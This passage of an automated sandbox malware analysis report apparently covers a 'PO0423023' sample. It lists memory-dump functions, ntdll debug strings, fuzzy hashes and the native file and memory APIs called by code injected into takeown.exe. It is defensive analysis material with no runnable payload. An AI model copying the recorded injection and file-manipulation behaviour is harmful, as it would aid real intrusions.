CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01A34742
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01A346FC
ExecuteOptions, xrefs: 01A346A0
Execute=1, xrefs: 01A34713
CLIENT(ntdll): Processing section info %ws..., xrefs: 01A34787
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01A34725
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01A34655

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: fbdf84d9699d964f4d6b1dde9785bc2d519c46bb5b3c46646c83c03bb6551ac3
Instruction ID: 660ba29c23666c8fbbb86a3962f85e168db890a60ec2ace250fe59af2f838236
Opcode Fuzzy Hash: fbdf84d9699d964f4d6b1dde9785bc2d519c46bb5b3c46646c83c03bb6551ac3
Instruction Fuzzy Hash: B25128316002197BEF25ABE8EC85FAA77BCAF58305F0400ADE709A71D1E7719A458F51

Uniqueness

Uniqueness Score: -1.00%

Function 01A96940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: 5cfc98526af225bf66ed0a71c961fffa7f6403347a9d23c665b0a6756f8c15bb
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: A9021571508342AFDB05CF28C590A6BBBF5EFC8704F04892DF9999B264DB31E985CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01A0B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01A0B6BF

Strings

0, xrefs: 01A0B66F
-, xrefs: 01A0B650
0, xrefs: 01A0B695
+, xrefs: 01A0B65A

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: c075bf17525724de2f2cf6854a49e987d4cc26c8aac243e0bc1016a04e5fdda9
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 2E81B138E062498EEF2BCF6CEA507BEBBB1AF45310F1C4559D851A72D1C73499408B71

Uniqueness

Uniqueness Score: -1.00%

Function 01A720E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01A7214F
___swprintf_l.LIBCMT ref: 01A72172

Strings

[, xrefs: 01A7212B
]:%u, xrefs: 01A72169
%%%u, xrefs: 01A72146

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 9cfe01ffb38fbabb77c494c8185930d3f2f26b39d85c2b0cd300f5b51f90c7a9
Instruction ID: 7d8d14bd58121c674941eb05248833b5c00fb2b0984de0c38ba8be1404775d3d
Opcode Fuzzy Hash: 9cfe01ffb38fbabb77c494c8185930d3f2f26b39d85c2b0cd300f5b51f90c7a9
Instruction Fuzzy Hash: 0121627AA00259ABDB11DF79ED40AFEBBF8FF54650F040126EA45E3241E730DA018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 019EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 01A3031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A302BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A302E7

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 0fa60ad2411243e3af6d2cf1a099ea2e4836cc8c967c520d0ba5f95bb1adbde9
Instruction ID: bfd79673e99b809377f634e424c53fe81ec60ba13ac740b3f286ae6bb1bd8d07
Opcode Fuzzy Hash: 0fa60ad2411243e3af6d2cf1a099ea2e4836cc8c967c520d0ba5f95bb1adbde9
Instruction Fuzzy Hash: 0FE1C0306047419FE726CF28C988B2ABBE4BF88714F140A5EF5A9CB2E1D775D945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 019FBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 01A37BAC
RTL: Resource at %p, xrefs: 01A37B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01A37B7F

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 1aa4221b4b3c036f421474cd7d71083fab32978872408f04d2f2e87e912975f4
Instruction ID: efef770dc234e9771f9c56b044d9ad82039aa1fa306a45e1f439633180195512
Opcode Fuzzy Hash: 1aa4221b4b3c036f421474cd7d71083fab32978872408f04d2f2e87e912975f4
Instruction Fuzzy Hash: 0541EF35704702AFD725DE29C940F6AB7E5EF88721F000A1DFA5B9B680DB31E8058B91

Uniqueness

Uniqueness Score: -1.00%

Function 019FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A3728C

Strings

RTL: Re-Waiting, xrefs: 01A372C1
RTL: Resource at %p, xrefs: 01A372A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01A37294

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 01328441b18321590dc9a45f4591721960d635f777c1cd90b799838d9daa670b
Instruction ID: 321849633cfeaaa6104f575f7c995d35dc6b52135d84f052f99b0112f99bea31
Opcode Fuzzy Hash: 01328441b18321590dc9a45f4591721960d635f777c1cd90b799838d9daa670b
Instruction Fuzzy Hash: 3C410271700202AFD721CFA9CD41F6AB7A5FB94B10F10061DFA5AAB280DB30F8568BD1

Uniqueness

Uniqueness Score: -1.00%

Function 01A72300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01A7238D
___swprintf_l.LIBCMT ref: 01A723B3

Strings

%%%u, xrefs: 01A72384
]:%u, xrefs: 01A723AA

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 59c53199998cb86e126a3701b2ebc86fb1f2ffda866053d9484c5ace4c142ba3
Instruction ID: d6bb77e1c5bb1cee5d18388460ac23e4fd2360a9d484350ca1b5140f32194c62
Opcode Fuzzy Hash: 59c53199998cb86e126a3701b2ebc86fb1f2ffda866053d9484c5ace4c142ba3
Instruction Fuzzy Hash: 4D319372A002199FDB20DF2DDD40BEEB7F8FF54610F44455AE949E3240EB30AB448BA0

Uniqueness

Uniqueness Score: -1.00%

Function 01A07D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01A07E8B

Strings

+, xrefs: 01A07DE8
-, xrefs: 01A07DDD

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 415167690a4b68f5e0e6cb0a09056a60b43caef496bb5da04675d4b2ab1bb369
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 5491B2B1E002169BEF26DFADE8806BEBBB5AF44320F54451EE995E72C0D734AD40CB51

Uniqueness

Uniqueness Score: -1.00%

Function 019C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 019C9191
@, xrefs: 019C9175

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 1b52e26e3dba0dde6853e3bb802a36e964c6b3e8b1759b1f582232af408b0354
Instruction ID: 79ecee8af4586b4101e0e72824e0f786931a1bfa7916fc84086cdaad4b079968
Opcode Fuzzy Hash: 1b52e26e3dba0dde6853e3bb802a36e964c6b3e8b1759b1f582232af408b0354
Instruction Fuzzy Hash: 07812B76D002699BDB31CB58CC45BEABBB8AB48714F0441EAEA0DB7240D7705E85CFA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: takeown.exePID: 6508, Parent PID: 5500COMMON

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	4.3%
Signature Coverage:	2.3%
Total number of Nodes:	441
Total number of Limit Nodes:	72

Executed Functions

Function 032E9290 Relevance: 47.9, Strings: 38, Instructions: 416
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

R, xrefs: 032E97C4
P, xrefs: 032E92DB
(, xrefs: 032E9625
o, xrefs: 032E94A5
m, xrefs: 032E94F3
<, xrefs: 032E93C4
=, xrefs: 032E93BA
@, xrefs: 032E9429
6, xrefs: 032E9451
Q,, xrefs: 032E9643
K , xrefs: 032E95A2
@1, xrefs: 032E97B8
Z9, xrefs: 032E961B
?, xrefs: 032E94DF
(-, xrefs: 032E95D4
k), xrefs: 032E9697
U, xrefs: 032E93E6
+v, xrefs: 032E966F
d, xrefs: 032E94E9
~, xrefs: 032E93A6
l, xrefs: 032E957C
C, xrefs: 032E9568
*, xrefs: 032E9572
k, xrefs: 032E92FD
)E, xrefs: 032E96A8
26, xrefs: 032E92B8
d, xrefs: 032E9433
dS, xrefs: 032E92C6
aw, xrefs: 032E95C0
o, xrefs: 032E9392
E, xrefs: 032E939C
2<, xrefs: 032E92CD
+, xrefs: 032E931B
Yh, xrefs: 032E9665
[, xrefs: 032E9554
h', xrefs: 032E9657
S;, xrefs: 032E9639
r-k), xrefs: 032E9B2A

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID:
String ID: (-$)E$*$+$+v$26$2<$6$<$=$?$@$@1$C$E$K $P$Q,$R$S;$Yh$Z9$[$aw$d$d$dS$h'$k$k)$m$o$o$r-k)$~$($U$l
API String ID: 0-2465727149
Opcode ID: 54934c854a93149475b0c861106bbf57fbadea9d77d4e19a07520bd98c30388a
Instruction ID: a8fec2d94e517a2340f27a1e9c87ea6bd6cea9c978541490c0f1b7084f6c7a84
Opcode Fuzzy Hash: 54934c854a93149475b0c861106bbf57fbadea9d77d4e19a07520bd98c30388a
Instruction Fuzzy Hash: 4B32ABB0D15269CBEB24CF44C999BDDBBB2BF45308F5081DAC5496B281C7B95AC8CF81

Uniqueness

Uniqueness Score: -1.00%

Function 032FBAC0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 032FBBA4
FindNextFileW.KERNELBASE(?,00000010), ref: 032FBBDF
FindClose.KERNELBASE(?), ref: 032FBBEA

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: c927c7041102adcda67a8ab029b4bab782eeb431d01b833dadfeb524d748aec7
Instruction ID: bc9d7305b106eba871f8d3a3173b81633d4ee9edfbd72463a8149ade3362ee1c
Opcode Fuzzy Hash: c927c7041102adcda67a8ab029b4bab782eeb431d01b833dadfeb524d748aec7
Instruction Fuzzy Hash: E2316175A103097BDB60DB64CC85FEFB77CDB44714F1445A8BA08AB194DAB4AAC4CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03307970 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 03307A60

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9d234b6aca245aad8eff6f70337dc1bdb9caa95836f43e374ce2c99a0cc4d41b
Instruction ID: 9fbdbf3f6a8d9e15bf376b8b4cb2a24e359fad91ba6049dcec7b596d1ae3fc95
Opcode Fuzzy Hash: 9d234b6aca245aad8eff6f70337dc1bdb9caa95836f43e374ce2c99a0cc4d41b
Instruction Fuzzy Hash: F631B1B5A11608ABCB14DF99D891EDFB7F9AF8C314F108219F909A7340D770A951CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 03307AD0 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 03307BA8

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0faf6a1543777b9159769b3b52369ead6480d26b71efc19fcaf9a87c85d44904
Instruction ID: aa5386ce761db3459f3f13e4597f01f728563148e258070beb42b43e05776fc7
Opcode Fuzzy Hash: 0faf6a1543777b9159769b3b52369ead6480d26b71efc19fcaf9a87c85d44904
Instruction Fuzzy Hash: 70310BB5A00609AFCB14DF99D881EEFB7B9EF8C314F108119F908A7384D770A911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03307DA0 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(032F162E,?,03306A07,00000000,00000004,00003000,?,?,?,?,?,03306A07,032F162E,03309A8E,03306A07,51F84D8D), ref: 03307E5D

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 3e1fabda3048be003f499ecec00da722f58517c1e7c43a44774aeff407354a47
Instruction ID: bcc0fe9e224d6a5c2cc859842d4556ae232604d733f14c4e04a0210963ff9149
Opcode Fuzzy Hash: 3e1fabda3048be003f499ecec00da722f58517c1e7c43a44774aeff407354a47
Instruction Fuzzy Hash: CD213DB5A00709ABCB10DF98DC91EAFB7B9EF88310F108119FD189B280D770A911CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 03307BB0 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 03307C3B

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 94e0ea33bbb342fe1b654188e61af7cc698cd6632349d4505271b8ebf0ebed06
Instruction ID: c068be87d2ae3f175eaf804b34b91452c8b76ba453476628351843f49eef25d0
Opcode Fuzzy Hash: 94e0ea33bbb342fe1b654188e61af7cc698cd6632349d4505271b8ebf0ebed06
Instruction Fuzzy Hash: 8E01C476A403087BD710EBA8CC91FEB73ACEB85710F504459FA095F280DBB0791487E5

Uniqueness

Uniqueness Score: -1.00%

Function 03307C50 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03307C84

Memory Dump Source

Source File: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32e0000_takeown.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 9f787ccbc3cff7bc2229462b8a74816a84789d61b7f0bcf32d0c621f97a323d5
Instruction ID: 4d3f06cce236f787267035b7b850fc114fc8fbb1fb513d460d1e2cacf0ac7655
Opcode Fuzzy Hash: 9f787ccbc3cff7bc2229462b8a74816a84789d61b7f0bcf32d0c621f97a323d5
Instruction Fuzzy Hash: 1BE086362017047BC610FA59DC41F9BB76CDFC5754F404415FA08AB281C6B1791187F4

Uniqueness

Uniqueness Score: -1.00%

Function 03AE4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE434A

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c0f69cc2efe0a509c0d5b998b9cdfd3f8f509d8f8d48c7120aaae7a15e74bc5
Instruction ID: e8803cc231af208af99dd82ea90a4c3d85354e20470aece9e90c97c13e17611f
Opcode Fuzzy Hash: 2c0f69cc2efe0a509c0d5b998b9cdfd3f8f509d8f8d48c7120aaae7a15e74bc5
Instruction Fuzzy Hash: 22900231605804169540B19848845464009D7E1301B56C112F1824554C8B18CA665371

Uniqueness

Uniqueness Score: -1.00%

Function 03AE4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE465A

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 70b8a3ff373415224f7dde699c0f834f48138b84f3ff36231876f6cbdc4aba84
Instruction ID: 1b4e0ca9ccfb223833051606360bd8afa66ea9ef489d1bf4ca7da54fa52213ea
Opcode Fuzzy Hash: 70b8a3ff373415224f7dde699c0f834f48138b84f3ff36231876f6cbdc4aba84
Instruction Fuzzy Hash: 34900261601504464540B19848044066009D7E2301396C216B1954560C871CC9659279

Uniqueness

Uniqueness Score: -1.00%

Function 03AE2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE2BAA

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1db7b6cb4f04ca1a45502097e2e136072358e7fe7020e5ceb89113ec4f8942cb
Instruction ID: 77bb5087b5967436c9ffbe2fc16a71820d6c36fa9b4641e8622f619b9661f662
Opcode Fuzzy Hash: 1db7b6cb4f04ca1a45502097e2e136072358e7fe7020e5ceb89113ec4f8942cb
Instruction Fuzzy Hash: EA90023160540C06D550B19844147460009C7D1301F56C112B1424654D8759CB6576B1

Uniqueness

Uniqueness Score: -1.00%

Function 03AE2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE2BEA

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7aaefb49ff85d31f725690b4759a6421fe2065aa332a52da8ed1a69726a35fc7
Instruction ID: 00c4e09a9bbb41156670782da51df647878a9de40f1dbb82f75bc0a9705af716
Opcode Fuzzy Hash: 7aaefb49ff85d31f725690b4759a6421fe2065aa332a52da8ed1a69726a35fc7
Instruction Fuzzy Hash: 0990023120544C46D540B1984404A460019C7D1305F56C112B1464694D9729CE65B671

Uniqueness

Uniqueness Score: -1.00%

Function 03AE2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE2BFA

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 20150967c9037f7e538a8c882691f78cc97d06a5a6f76c0f29de97506747dbfe
Instruction ID: 3191d8d54f49f0615f6a6e3a0379e3a312a5dbe45a4db39128b09e821bd98beb
Opcode Fuzzy Hash: 20150967c9037f7e538a8c882691f78cc97d06a5a6f76c0f29de97506747dbfe
Instruction Fuzzy Hash: 2990023120140C06D580B198440464A0009C7D2301F96C116B1425654DCB19CB6977B1

Uniqueness

Uniqueness Score: -1.00%

Function 03AE2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE2B6A

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 640540a94e50330bcf2833d2ecce7ac6bef18069eb7d1349342f2416c8a43f27
Instruction ID: 78e08917898c3549a6e18ad32396b7ad0d8d4c91187fe0350a53397e3f030dff
Opcode Fuzzy Hash: 640540a94e50330bcf2833d2ecce7ac6bef18069eb7d1349342f2416c8a43f27
Instruction Fuzzy Hash: 69900261202404074505B1984414616400EC7E1201B56C122F2414590DC729C9A16135

Uniqueness

Uniqueness Score: -1.00%

Function 03AE2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE2AFA

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3a34a25e143872bc0ad2326ae21a34f03b65cb476978dfb5ef5008e6fa4e0391
Instruction ID: 77e10f3598d8cd1896831f3fd87affd0a862dc96ebb7e503407f55e845b71fa1
Opcode Fuzzy Hash: 3a34a25e143872bc0ad2326ae21a34f03b65cb476978dfb5ef5008e6fa4e0391
Instruction Fuzzy Hash: F4900225221404060545F598060450B0449D7D7351396C116F2816590CC725C9755331

Uniqueness

Uniqueness Score: -1.00%

Function 03AE2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03AE2ADA

Memory Dump Source

Source File: 00000006.00000002.3262997035.0000000003A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A70000, based on PE: true

Associated: 00000006.00000002.3262997035.0000000003B99000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3262997035.0000000003C0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3a70000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
